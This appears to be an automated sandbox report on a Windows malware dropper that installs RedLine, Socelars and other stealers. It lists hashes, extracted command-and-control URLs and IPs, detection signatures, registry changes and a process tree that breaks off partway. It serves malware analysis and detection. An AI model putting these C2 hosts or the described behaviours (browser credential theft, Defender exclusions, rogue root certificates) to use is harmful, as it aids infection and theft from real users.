Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
18-08-2024 01:51
Static task
static1
Behavioral task
behavioral1
Sample
a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
a4ed242cae44c8b0bf982ba536e7f4a4
-
SHA1
1468ccf6396f93cdae03b81aed87ea2211b9a4fa
-
SHA256
c05dcc1cf5041eb12034132df4ae105c6abccae45e18a11b102f6d8340f68e6c
-
SHA512
099dfeef428a0a294aea746b37fead0d6e77d8ec21a23ad567630975b1c0cb41e6c3e031879efc10ec1c7adb25473cebbb094492a4a30f79021c44dff925eb58
-
SSDEEP
98304:J1Dvlv8ATz3d3v0UF7MT22iN9BwU1fzu74IalBu7gurBW:JP0ATLdzK22iN9Rte41U7ggW
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.hbgents.top/
http://www.rsnzhy.com/
http://www.znsjis.top/
Extracted
redline
jamesoldd
65.108.20.195:6774
Extracted
redline
ANI
45.142.215.47:27643
Extracted
nullmixer
http://hsiens.xyz/
Extracted
gcleaner
gcl-page.biz
194.145.227.161
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000016108-85.dat family_fabookie -
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 7 IoCs
resource yara_rule behavioral1/memory/1924-150-0x00000000009B0000-0x00000000009D6000-memory.dmp family_redline behavioral1/memory/1924-151-0x00000000023C0000-0x00000000023E4000-memory.dmp family_redline behavioral1/memory/2152-201-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2152-200-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2152-197-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2152-195-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/2152-203-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SectopRAT payload 7 IoCs
resource yara_rule behavioral1/memory/1924-150-0x00000000009B0000-0x00000000009D6000-memory.dmp family_sectoprat behavioral1/memory/1924-151-0x00000000023C0000-0x00000000023E4000-memory.dmp family_sectoprat behavioral1/memory/2152-201-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/2152-200-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/2152-197-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/2152-195-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat behavioral1/memory/2152-203-0x0000000000400000-0x0000000000422000-memory.dmp family_sectoprat -
Socelars payload 1 IoCs
resource yara_rule behavioral1/files/0x00050000000191fe-86.dat family_socelars -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
OnlyLogger payload 2 IoCs
resource yara_rule behavioral1/memory/2776-245-0x0000000000400000-0x000000000046F000-memory.dmp family_onlylogger behavioral1/memory/2776-264-0x0000000000400000-0x000000000046F000-memory.dmp family_onlylogger -
Blocklisted process makes network request 2 IoCs
flow pid Process 74 1292 rundll32.exe 80 1292 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1084 powershell.exe -
resource yara_rule behavioral1/files/0x0005000000019249-60.dat aspack_v212_v242 behavioral1/files/0x0005000000019246-64.dat aspack_v212_v242 behavioral1/files/0x0005000000019256-68.dat aspack_v212_v242 -
Executes dropped EXE 18 IoCs
pid Process 2024 setup_installer.exe 2836 setup_install.exe 1492 Fri2271b04a0f.exe 772 Fri22bbc66c2a1d88ca.exe 1692 Fri22e6b0f88ca7.exe 2688 Fri22211ed5192070.exe 1052 Fri226cff092ae.exe 1924 Fri225e7ac14f.exe 1604 Fri222ae8c487.exe 2348 Fri225c3b736cde03.exe 2980 Fri2299c3f912d.exe 2928 Fri227d78279da52a1.exe 2116 Fri225e887fa84d58e.exe 2776 Fri221ad3d21c.exe 2064 Fri22bbc66c2a1d88ca.tmp 1368 SkVPVS3t6Y8W.EXe 2152 Fri227d78279da52a1.exe 2812 f784c1d.exe -
Loads dropped DLL 64 IoCs
pid Process 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 2024 setup_installer.exe 2024 setup_installer.exe 2024 setup_installer.exe 2024 setup_installer.exe 2024 setup_installer.exe 2024 setup_installer.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2836 setup_install.exe 2312 cmd.exe 2360 cmd.exe 2856 cmd.exe 1492 Fri2271b04a0f.exe 1492 Fri2271b04a0f.exe 2940 cmd.exe 2940 cmd.exe 2360 cmd.exe 1520 cmd.exe 2936 cmd.exe 1760 cmd.exe 772 Fri22bbc66c2a1d88ca.exe 772 Fri22bbc66c2a1d88ca.exe 1136 cmd.exe 1136 cmd.exe 1692 Fri22e6b0f88ca7.exe 1692 Fri22e6b0f88ca7.exe 1924 Fri225e7ac14f.exe 1924 Fri225e7ac14f.exe 1104 cmd.exe 2256 cmd.exe 2348 Fri225c3b736cde03.exe 2348 Fri225c3b736cde03.exe 2176 cmd.exe 1604 Fri222ae8c487.exe 1604 Fri222ae8c487.exe 536 cmd.exe 536 cmd.exe 2928 Fri227d78279da52a1.exe 2928 Fri227d78279da52a1.exe 2980 Fri2299c3f912d.exe 2980 Fri2299c3f912d.exe 2776 Fri221ad3d21c.exe 2776 Fri221ad3d21c.exe 772 Fri22bbc66c2a1d88ca.exe 2064 Fri22bbc66c2a1d88ca.tmp 2064 Fri22bbc66c2a1d88ca.tmp 2064 Fri22bbc66c2a1d88ca.tmp 828 WerFault.exe 828 WerFault.exe 828 WerFault.exe 1284 cmd.exe 1368 SkVPVS3t6Y8W.EXe 1368 SkVPVS3t6Y8W.EXe 828 WerFault.exe 2928 Fri227d78279da52a1.exe 3000 rundll32.exe 3000 rundll32.exe 3000 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
flow ioc 63 pastebin.com 65 pastebin.com 30 iplogger.org 34 iplogger.org 35 iplogger.org 36 iplogger.org 38 iplogger.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 22 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2928 set thread context of 2152 2928 Fri227d78279da52a1.exe 71 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 828 2836 WerFault.exe 31 2744 2812 WerFault.exe 87 -
System Location Discovery: System Language Discovery 1 TTPs 44 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f784c1d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language control.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri227d78279da52a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri227d78279da52a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language setup_install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri22bbc66c2a1d88ca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri225c3b736cde03.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SkVPVS3t6Y8W.EXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri225e7ac14f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri222ae8c487.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri2299c3f912d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri22e6b0f88ca7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri22bbc66c2a1d88ca.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri2271b04a0f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fri221ad3d21c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Kills process with taskkill 2 IoCs
pid Process 2084 taskkill.exe 2700 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 Fri2299c3f912d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 Fri2299c3f912d.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 Fri2299c3f912d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Fri2299c3f912d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 Fri2299c3f912d.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1084 powershell.exe 1292 rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 2776 Fri221ad3d21c.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 2980 Fri2299c3f912d.exe Token: SeAssignPrimaryTokenPrivilege 2980 Fri2299c3f912d.exe Token: SeLockMemoryPrivilege 2980 Fri2299c3f912d.exe Token: SeIncreaseQuotaPrivilege 2980 Fri2299c3f912d.exe Token: SeMachineAccountPrivilege 2980 Fri2299c3f912d.exe Token: SeTcbPrivilege 2980 Fri2299c3f912d.exe Token: SeSecurityPrivilege 2980 Fri2299c3f912d.exe Token: SeTakeOwnershipPrivilege 2980 Fri2299c3f912d.exe Token: SeLoadDriverPrivilege 2980 Fri2299c3f912d.exe Token: SeSystemProfilePrivilege 2980 Fri2299c3f912d.exe Token: SeSystemtimePrivilege 2980 Fri2299c3f912d.exe Token: SeProfSingleProcessPrivilege 2980 Fri2299c3f912d.exe Token: SeIncBasePriorityPrivilege 2980 Fri2299c3f912d.exe Token: SeCreatePagefilePrivilege 2980 Fri2299c3f912d.exe Token: SeCreatePermanentPrivilege 2980 Fri2299c3f912d.exe Token: SeBackupPrivilege 2980 Fri2299c3f912d.exe Token: SeRestorePrivilege 2980 Fri2299c3f912d.exe Token: SeShutdownPrivilege 2980 Fri2299c3f912d.exe Token: SeDebugPrivilege 2980 Fri2299c3f912d.exe Token: SeAuditPrivilege 2980 Fri2299c3f912d.exe Token: SeSystemEnvironmentPrivilege 2980 Fri2299c3f912d.exe Token: SeChangeNotifyPrivilege 2980 Fri2299c3f912d.exe Token: SeRemoteShutdownPrivilege 2980 Fri2299c3f912d.exe Token: SeUndockPrivilege 2980 Fri2299c3f912d.exe Token: SeSyncAgentPrivilege 2980 Fri2299c3f912d.exe Token: SeEnableDelegationPrivilege 2980 Fri2299c3f912d.exe Token: SeManageVolumePrivilege 2980 Fri2299c3f912d.exe Token: SeImpersonatePrivilege 2980 Fri2299c3f912d.exe Token: SeCreateGlobalPrivilege 2980 Fri2299c3f912d.exe Token: 31 2980 Fri2299c3f912d.exe Token: 32 2980 Fri2299c3f912d.exe Token: 33 2980 Fri2299c3f912d.exe Token: 34 2980 Fri2299c3f912d.exe Token: 35 2980 Fri2299c3f912d.exe Token: SeDebugPrivilege 2688 Fri22211ed5192070.exe Token: SeDebugPrivilege 1052 Fri226cff092ae.exe Token: SeDebugPrivilege 2084 taskkill.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 2700 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 1688 wrote to memory of 2024 1688 a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe 30 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2024 wrote to memory of 2836 2024 setup_installer.exe 31 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2216 2836 setup_install.exe 33 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2360 2836 setup_install.exe 34 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2256 2836 setup_install.exe 35 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2176 2836 setup_install.exe 36 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 2312 2836 setup_install.exe 37 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 536 2836 setup_install.exe 38 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1520 2836 setup_install.exe 39 PID 2836 wrote to memory of 1760 2836 setup_install.exe 40
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\a4ed242cae44c8b0bf982ba536e7f4a4_JaffaCakes118.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2024 -
C:\Users\Admin\AppData\Local\Temp\7zS8E71DD86\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8E71DD86\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2836 -
